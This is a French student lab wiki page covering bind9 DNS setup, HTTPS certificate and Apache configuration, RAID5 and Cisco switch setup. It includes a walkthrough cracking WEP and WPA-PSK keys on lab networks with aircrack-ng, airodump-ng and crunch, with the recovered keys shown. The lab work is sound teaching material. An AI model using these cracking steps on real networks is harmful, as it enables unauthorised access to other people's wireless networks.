Par défaut, les serveurs de noms (DNS) sont 3 serveurs de DNS Live Gandi, il faut ajouter les serveurs externes :&lt;br /&gt;
*ns6.gandi.net  '''217.70.177.40'''&lt;br /&gt;
*dns.ima2a5-rex4ever.site   '''193.48.57.163'''&lt;br /&gt;
'''Note:''' il faut compter 12 à 24 heures pour la propagation sur Internet.&lt;br /&gt;
==== Le paramétrage de bind9 ====&lt;br /&gt;
Le paramétrage repose sur la configuration de ses 3 fichiers :&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.options =====&lt;br /&gt;
Ce fichier permet de gérer les DNS authorisés (de manière générale) à récuperer des informations de notre site. On le modifie pour permettre au dns de gandi de récuperer les données :&lt;br /&gt;
&lt;br /&gt;
     options {&lt;br /&gt;
     &lt;br /&gt;
         // forwarders {&lt;br /&gt;
         //     0.0.0.0;&lt;br /&gt;
         // };&lt;br /&gt;
         // dnssec-validation auto;&lt;br /&gt;
         auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         '''allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };'''&lt;br /&gt;
     };&lt;br /&gt;
     &lt;br /&gt;
     '''acl &amp;quot;allowed_to_transfer&amp;quot; {'''&lt;br /&gt;
        ''' 217.70.177.40/32; // adresse IP du dns6.gandi.net'''&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.local =====&lt;br /&gt;
Il faut maintenant déclarer à Bind9 le nom de notre fichier de configuration de DNS sous forme de zone , on le fait via ce fichier. On lui renseigne la zone : &lt;br /&gt;
    &lt;br /&gt;
     zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.ima2a5-rex4ever.site&amp;quot;;&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== le fichier /etc/bind/db.ima2a5-rex4ever.site=====&lt;br /&gt;
Enfin, il faut créer le fichier de configuration précedemment appelé : &lt;br /&gt;
&lt;br /&gt;
   ;&lt;br /&gt;
   ; BIND data file for local loopback interface&lt;br /&gt;
   ;&lt;br /&gt;
   $TTL    604800&lt;br /&gt;
   @       IN      SOA     dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (  &amp;lt;= METTRE UNE ADRESSE BIDON , pas necessaire&lt;br /&gt;
                           21112019        ; Serial&lt;br /&gt;
                            604800         ; Refresh&lt;br /&gt;
                             86400         ; Retry&lt;br /&gt;
                           2419200         ; Expire&lt;br /&gt;
                            604800 )       ; Negative Cache TTL&lt;br /&gt;
   ;&lt;br /&gt;
   @       IN      NS      dns.ima2a5-rex4ever.site.  &amp;lt;= DN du site &lt;br /&gt;
   @       IN      NS      ns6.gandi.net.&amp;lt;= DNS de gandi&lt;br /&gt;
   dns     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE DNS&lt;br /&gt;
   www     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE SITE&lt;br /&gt;
&lt;br /&gt;
Après 5 minutes de cuisson et avoir relancé bind9, c'est prêt le site en http est accessible et visualisable! On peut acceder au site internet http://www.ima2a5-rex4ever.site !&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTPS ==&lt;br /&gt;
Le SSL (Secure Socket Layer) / TLS (Transport Layer Security) est le protocole de sécurité le plus répandu qui créé un canal sécurisé entre deux machines communiquant sur Internet ou un réseau interne. Dans notre société centrée sur un Internet vulnérable, le SSL est généralement utilisé lorsqu'un navigateur doit se connecter de manière sécurisée à un serveur web.&lt;br /&gt;
&lt;br /&gt;
=== Generation d'un certificat ===&lt;br /&gt;
&lt;br /&gt;
La première étape pour générer un certificat est de concevoir un jeu de 2 clefs qui sont un '''.key''' et un '''.csr''' &lt;br /&gt;
Pour obtenir ces deux fichiers, nous utilisons l'utilitaire '''OpenSSL'''.&lt;br /&gt;
      openssl req -nodes -newkey rsa:2048 -sha256 -keyout ima2a5-rex4ever.key -out ima2a5-rex4ever.csr &lt;br /&gt;
&lt;br /&gt;
'''Mais alors comment marche cette commande?'''&lt;br /&gt;
Après avoir lu le descriptif que l'on peut obtenir via [http://www.delafond.org/traducmanfr/man/man1/openssl.1.html man openssl], il en ressort que les arguments sont :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Argument !! explication&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|req&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Gestion X.509 Certificate Signing Request (CSR). &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-nodes&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Pas de chiffrage sur la clef privée (option arbitraire no des)&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-newkey rsa:2048&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|demande de Génération d'une paire de clef RSA de 2048 bits et d'une demande de certificat.&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-keyout ima2a5-rex4ever.key&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre .key&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-out ima2a5-rex4ever.csr &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre demande de certificat .csr&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
Pour générer en bon éduforme notre demande,l'utilitaire a besoin des informations, voici ce que nous avons répondu:&lt;br /&gt;
&lt;br /&gt;
      Country Name (2 letter code) [AU]:'''FR'''&lt;br /&gt;
      State or Province Name (full name) [Some-State]:'''Nord'''&lt;br /&gt;
      Locality Name (eg, city) []:'''Lille'''&lt;br /&gt;
      Organization Name (eg, company) [Internet Widgits Pty Ltd]:'''Polytech Lille'''&lt;br /&gt;
      Organizational Unit Name (eg, section) []:'''IMA2A5'''&lt;br /&gt;
      Common Name (e.g. server FQDN or YOUR name) []:'''ima2a5-rex4ever.site'''&lt;br /&gt;
      Email Address []:'''pascal.coint@polytech-lille.net'''&lt;br /&gt;
      &lt;br /&gt;
      Please enter the following 'extra' attributes&lt;br /&gt;
      to be sent with your certificate request&lt;br /&gt;
      A challenge password []:'''glopglop!'''&lt;br /&gt;
      Optionnal informations :&lt;br /&gt;
&lt;br /&gt;
==== Affectation du certificat sur Gandi.net ====&lt;br /&gt;
Après avoir répondu , il génère alors 2 fichiers. Le '''.key''' est notre clef privée elle restera donc en notre unique possession. On partage avec gandhi (qui est également un générateur de certificat) notre '''.csr'''. Il va donc étudier la validité de notre domaine et le certifier ou non.&lt;br /&gt;
&lt;br /&gt;
''' Contenu de notre CSR'''&lt;br /&gt;
      -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
      MIIDBTCCAe0CAQAwgaUxCzAJBgNVBAYTAkZSMQ0wCwYDVQQIDAROb3JkMQ4wDAYD&lt;br /&gt;
      VQQHDAVMaWxsZTEXMBUGA1UECgwOUG9seXRlY2ggTGlsbGUxDzANBgNVBAsMBklN&lt;br /&gt;
      QTJBNTEdMBsGA1UEAwwUaW1hMmE1LXJleDRldmVyLnNpdGUxLjAsBgkqhkiG9w0B&lt;br /&gt;
      CQEWH3Bhc2NhbC5jb2ludEBwb2x5dGVjaC1saWxsZS5uZXQwggEiMA0GCSqGSIb3 &lt;br /&gt;
      DQEBAQUAA4IBDwAwggEKAoIBAQDBKS9p8572UiXo2W1dAiKEKLq+B6ge/si0AhMH&lt;br /&gt;
      fLtovMz7Xvy/9oQnq25SvkWaNRuAJrvzROGS2mzkG9IEhnEpWSTNvspTO60PgNPo&lt;br /&gt;
      EUYcgKAeEuVVJyom3K3ioBOvllucQfiOIB/ykvP80s+9Wjo2vf2PkESPTjfM0zKP&lt;br /&gt;
      2JMT9cGQV6auD7NU+Ygz7w5dW/NKkU2KZA9HQ7i95+/ST3r2T0D8xP/ltEBC0Q7i&lt;br /&gt;
      U/OVkAKn6CPJ6KtkbQYvgKVG95IM5SQb/WxRVNnHKS4f+erNFYpx5iNiHhv6larV&lt;br /&gt;
      G0oR9uNsg7tOhdhcVVnooGSAsoxtgmDLwzuuho+3fS4t1K83AgMBAAGgGjAYBgkq&lt;br /&gt;
      hkiG9w0BCQcxCwwJZ2xvcGdsb3AhMA0GCSqGSIb3DQEBCwUAA4IBAQB7jtWizvBQ&lt;br /&gt;
      dNEyyVRhS563mKFo34RWW4g5tpnPC6wepQ7tvHo6gZZtzljobsWF55lRK7/Pi8eh&lt;br /&gt;
      ANyQxb1Lo9FcHJcUOEMc8heeutSZQoCslTdRNMe+uBhQ/qCLXjy+fgdptqPi9cXP&lt;br /&gt;
      zi8gBbrAQ9sHqJPK/RwhzuhCkBSzYgoNbYLjrHf8lCe60+7+0HBKM3jpTUDmzrzg&lt;br /&gt;
      Kmb8GmkgcrzKSNhlOFZpiQqBJUfK5zJEucdhJ0j7Tupwf+J2oO+TccnCNH7o1Ykc&lt;br /&gt;
      7ANKYKpf8AoCcZenLutCXt3YGjT8INuh5SnpsyR3BZUK9hNzZGK9Ilv9hwiEnmaS&lt;br /&gt;
      PQWRkLUGQdh+&lt;br /&gt;
      -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Puis, Gandi.net va demander une méthode de vérification sur le serveur web cible afin de savoir s'il s'agit bien de notre serveur.Il existe trois possibilités:&lt;br /&gt;
*Par verification DNS&lt;br /&gt;
*Par Mail&lt;br /&gt;
*Par fichier&lt;br /&gt;
Nous avons choisi la méthode par fichier, certes un peu longue mais ne nécessitant pas l'intervention de Monsieur Redon.&lt;br /&gt;
On copie ainsi un fichier temporaire à l'endroit indiqué par gandi et on attend que gandi valide la demande.&lt;br /&gt;
Après une verification de la part de Gandi (qui nécessite plusieurs dizaines de minutes), on obtient un certificat ('''.csr''') et le certificat intermédiaire ('''.pem''')&lt;br /&gt;
Ils sont nécessaires pour la configuration du site en HTTPS.&lt;br /&gt;
&lt;br /&gt;
=== S'assurer qu'Apache écoute le port 443 (protocole https) ===&lt;br /&gt;
On sait que le protocole HTTPS se sert du port 443 pour communiquer , verifions alors que c'est bien le cas : &lt;br /&gt;
    root@ima2a5-rex4ever:/etc/apache2# netstat -tanpu |grep &amp;quot;LISTEN&amp;quot; |grep &amp;quot;443&amp;quot;&lt;br /&gt;
    tcp6       0      0 :::443                  :::*                    LISTEN      10706/apache2&lt;br /&gt;
Le résultat indique en effet que le port 443 est ecouté par apache2, ce qui signifie qu'il ne faut pas faire de configuration supplémentaire.&lt;br /&gt;
&lt;br /&gt;
=== Activation du protocole SSL ===&lt;br /&gt;
Il faut activer le module qui gère le protocole SSL via la commande : &lt;br /&gt;
   a2enmode ssl&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=== Configuration du VirtualHost Apache pour le protocole HTTPS ===&lt;br /&gt;
Afin de ne pas saboter la configuration HTTP déjà en place, on va dupliquer la configuration disponible dans /sites-available:&lt;br /&gt;
    cp ima2a5-rex4ever.site.conf ima2a5-rex4ever.site-ssl.conf&lt;br /&gt;
Modification :&lt;br /&gt;
   &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
  #   General setup for the virtual host&lt;br /&gt;
     DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
     ServerName ima2a5-rex4ever.site:443                                                                                                                                                                                                          ServerAdmin pascal.coint@polytech-lille.net                                                                                                                                                                                                  ErrorLog &amp;quot;/usr/local/apache2/logs/error_log&amp;quot;                                                                                                                                                                                                 TransferLog &amp;quot;/usr/local/apache2/logs/access_log&amp;quot;                                                                                                                                                                                          # Activation du SSL                                                                                                                                                                                                                                SSLEngine On&lt;br /&gt;
    &lt;br /&gt;
    # Activation de tous les protocoles sécurisés (TLS v1.0, v1.1 et TLS v1.2) touut en désactivant les protocoles non sécurisés (SSL v2, SSL v3)&lt;br /&gt;
    SSLProtocol All -SSLv3 -SSLv2&lt;br /&gt;
    # Le navigateur devra choisir une méthode de chiffrement en respectant l'ordre indiquée dans SSLCipherSuite&lt;br /&gt;
    SSLHonorCipherOrder on&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers le certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.cer&amp;quot;&lt;br /&gt;
    SSLCACertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.pem&amp;quot;&lt;br /&gt;
    # Chemin vers la clée privée du certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateKeyFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.key&amp;quot;    &lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
On peut maintenant permuter les fichiers .conf et renommer notre ancien .conf en &amp;quot;ima2a5-rex4ever.site-http.conf&amp;quot;&lt;br /&gt;
'''Note :''' Comme vous aurez pu le remarquer, j'ai créer un dossier certificate dans lequel j'ai mis le .cer,le .csr,le.key et le .pem afin de ne pas les perdre.&lt;br /&gt;
On va ensuite décharger puis recharger le site :&lt;br /&gt;
   a2dissite ima2a5-rex4ever.site&lt;br /&gt;
   a2ensite ima2a5-rex4ever.site&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Ensuite on va regarder quels sont nos sites actifs à l'aide de apache2ctl -S , ce qui retourne :&lt;br /&gt;
    *:80                   ima2a5-rex4ever.site (/etc/apache2/sites-enabled/000-default.conf:1)&lt;br /&gt;
    *:443                  ima2a5-rex4ever.site (/etc/apache2/sites-enabled/ima2a5-rex4ever.site.conf:13)&lt;br /&gt;
Le site est prêt pour le HTTPS&lt;br /&gt;
&lt;br /&gt;
=== Securisation du DNS : Le DNSSEC ===&lt;br /&gt;
Avoir un site sécurisé c'est bien , avoir toute la chaine de transmission pour éviter les fraude c'est encore mieux. Pour cela, il est possible de concevoir un DNSSEC (contraction de DNS SECURISED)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Attaque d'une installation Wi-fi ==&lt;br /&gt;
=== Description ===&lt;br /&gt;
Notre Client Wi-fi est un ordinateur portable fourni par Monsieur Redon. Il ne nécessite pas nécessairement de configuration. Cependant, la clef Wi-Fi fournie avec elle doit être paramétrée (la datasheet peut se trouver à l'adresse suivant ; [https://www.farnell.com/datasheets/1669935.pdf Datasheet]). De plus, il faut installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA&lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il suffit de taper la commande :&lt;br /&gt;
    apt-get install aircrack-ng&lt;br /&gt;
'''Note:''' il faut auparavant configurer le réseau pour se connecter à internet.&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de '''airmon-ng''' qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
   airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
   airmong-ng start NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
   airodump-ng --encrypt wep NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis à l'aide d'un second terminal, on peut stocker les informations volées dans un .txt :&lt;br /&gt;
   Airodump-ng FICHIER.txt -c 2 --bssid ADDRESSBSSID NOMRESEAUESPIONNABLE&lt;br /&gt;
Ce qui donne dans notre cas : &lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wep wlan0mon &lt;br /&gt;
   Airodump-ng -w reseau_1.txt -c 2 --bssid 04:DA:D2:50:53 wlan0mon   (&amp;lt;== pour le réseau cracotte 3)&lt;br /&gt;
&lt;br /&gt;
Commence alors le craquage de la clef Wifi en Wep. On estime qu'il faut capturer plus ou moins 50 000 datas pour approximer 50% de chance de craquer la clef.&lt;br /&gt;
Après 40 000 datas volées , on réussit à craquer la clef, il nous aura fallu environ '''14 minutes'''.&lt;br /&gt;
&lt;br /&gt;
    KEY FOUND! [BA:BE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44 ]&lt;br /&gt;
    Decrypted correctly : 100%&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA-PSK ===&lt;br /&gt;
De même que précedemment, on recommence en changeant le --encrypt et on obtient :&lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wpa wlan0mon &lt;br /&gt;
On obtient les informations suivantes sur notre réseau cible : &lt;br /&gt;
Channel: 2&lt;br /&gt;
SSIDName: kracotte03&lt;br /&gt;
BSSIDAdress: 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
On peut alors espionner et voler des informations avec les '''handshakes''':&lt;br /&gt;
airodump-ng -w kracotte03 -c 2 --bssid 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
'''-w kracotte03''' indique que l'on souhaite tout enregistrer dans un fichier nommé '''kracotte03.'''. On obtient alors après un moment les datas volées et les informations sont extraites sous plusieurs formats. &lt;br /&gt;
Le format '''.cap''' est compatible avec l'utilitaire que nous allons utiliser, on le copie donc sur une clef USB et on va cracker la clef sur une zabeth (vitesse de calcul plus elevée).&lt;br /&gt;
Pour se faire , on construit un dictionnaire (ensemble possible de toutes les combinaisons) avec l'utilitaire Crunch via la commande :&lt;br /&gt;
   crunch 8 8 123456789 &amp;gt;&amp;gt; Dico.txt &lt;br /&gt;
Notre dictionnaire est largement simplifié car nous sommes au courant qu'il s'agit d'un ensemble de 8 chiffres de 1 a 9 , ce qui permet de préciser à crunch une taille min et max de 8 et les caractères admissibles de 1 à 9&lt;br /&gt;
Le dictionnaire est maintenant prêt, on lance alors le cassage de clef par force brute :&lt;br /&gt;
aircrack-ng psk-01.cap -w Dico.txt&lt;br /&gt;
&lt;br /&gt;
Après TREEEEEEEEEEEEEEEEEEEEEEEEEEEEEES Longtemps , on obtient la clef :&lt;br /&gt;
      [00:21:41] 10233332/102795810 keys tested (7985.18 k/s) &lt;br /&gt;
      &lt;br /&gt;
      Time left: 3 hours, 13 minutes, 12 seconds                 9.96%&lt;br /&gt;
                           KEY FOUND! [ 10233333 ]&lt;br /&gt;
      Master Key     : 5A D9 A4 39 7A 4E 14 A6 44 DE C4 AB FF 1E 63 D7 &lt;br /&gt;
                       46 7B F8 02 23 ED EA A9 82 3F 6A FC 68 DE F2 5D &lt;br /&gt;
      Transient Key  : 29 DA 59 3B EC 25 DB 6A 62 AD 50 2C 17 52 BC F8 &lt;br /&gt;
                       C9 CD 7C 85 A5 07 7E 44 84 B5 A6 EB 2E 47 B3 D0 &lt;br /&gt;
                       1C CC CC F8 24 EB 00 0A C0 7B B8 60 13 AE 57 74 &lt;br /&gt;
                       1E 15 A9 FC D7 A8 E5 C6 14 9B 01 60 E4 C4 96 43 &lt;br /&gt;
      EAPOL HMAC     : 15 99 D7 E0 33 B3 E1 4C 57 6F 8E E4 69 AF B0 08&lt;br /&gt;
&lt;br /&gt;
== Securisation d'un réseau Wi-Fi ==&lt;br /&gt;
=== Creation du Raid5 avec mdadm ===&lt;br /&gt;
Nous commencons par créer un RAID5 comme demandé dans la partie 6.1 du sujet. Pour se faire on commence par créer 3 disques de 1Go chacun:&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk1 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk2 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk3 virtual&lt;br /&gt;
On éteint la machine et on recommence la même manipulation que pour la partie 3.5.1 du wiki pour attacher disk1,disk2 et disk3.&lt;br /&gt;
Nos 3 disques sont maintenant reliées à notre machine comme on le peut voir avec la commande '''fdisk -l'''&lt;br /&gt;
&lt;br /&gt;
   Disk /dev/xvdb3: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb4: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb5: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
&lt;br /&gt;
On nous propose de réaliser le raid5 logiciel avec l'utilitaire mdadm ([https://doc.ubuntu-fr.org/raid_logiciel mdadm])&lt;br /&gt;
Assemblons maintenant nos 3 disques en un RAID5 via la commande : &lt;br /&gt;
   mdadm --create /dev/md0 --level=5  --raid-devices=3 /dev/xvdb3 /dev/xvdb4 /dev/xvdb5&lt;br /&gt;
'''Note:''' Ne pas essayer de renommer md0&lt;br /&gt;
Pour automatiser le raid5 à chaque démarrage: &lt;br /&gt;
   mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
Puis le formatage du volume RAID nouvellement créé:&lt;br /&gt;
   mkfs.ext4 /dev/md0&lt;br /&gt;
Déclarez ce volume dans `fstab` pour que le système le monte au démarrage (le système de fichier, pas le volume en lui même). Pour ce faire Editez le fichier /etc/fstab et ajoutez à sa fin la ligne :&lt;br /&gt;
   /dev/md0 	/media/raid	ext4	defaults 	0	1&lt;br /&gt;
Puis créer le fichier /media/raid qui est le fichier sur lequel le raid est monté : &lt;br /&gt;
   mkdir /media/raid&lt;br /&gt;
En retirant un disque (mise en commentaire /etc/fstab), le disque md0 est toujours actif et utilisable.&lt;br /&gt;
&lt;br /&gt;
== Architecture Réseau ==&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des 2 commutateurs ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs&lt;br /&gt;
&lt;br /&gt;
    enable           // passage en admin pour pouvoir accéder aux données du commutateur&lt;br /&gt;
    write            // Sauvegarde de la configuration et l’implanter dans le commutateur&lt;br /&gt;
    show interface status OU sh int status  // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées&lt;br /&gt;
    configuration terminal    // permets d'accéder aux interfaces et ainsi pouvoir les modifier&lt;br /&gt;
    exit             // permets de sortir du configurateur actuel (par exemple sortir de l'interface)&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports du commutateur =====&lt;br /&gt;
&lt;br /&gt;
Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306&lt;br /&gt;
 - Un lien vers le routeur&lt;br /&gt;
 - Un lien vers la borne wifi&lt;br /&gt;
 - Un lien vers Corduan&lt;br /&gt;
 - Un lien vers l'autre commutateur&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Connexion !! E304 !! E306&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Corduan&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Borne Wifi&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Commutateur&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Router&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour la borne wifi =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    //Rendre accessible la modification du port&lt;br /&gt;
    switchport trunk encapsulation dot1q   //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port&lt;br /&gt;
    switchport mode trunk   //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port&lt;br /&gt;
    no shut    //Démarre le port ou de le garder actif&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour Corduan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour le router =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour l'autre commutateur =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création des Vlan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 42&lt;br /&gt;
    name Corduan&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 2 à 7&lt;br /&gt;
    name groupe 1 à 6&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 130&lt;br /&gt;
    name interconnexion&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
Pour supprimer un vlan il suffit de faire :&lt;br /&gt;
    no vlan X&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E304 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
